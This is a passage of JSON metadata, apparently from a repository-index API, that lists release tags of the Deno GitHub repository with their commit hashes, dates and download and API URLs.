6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839f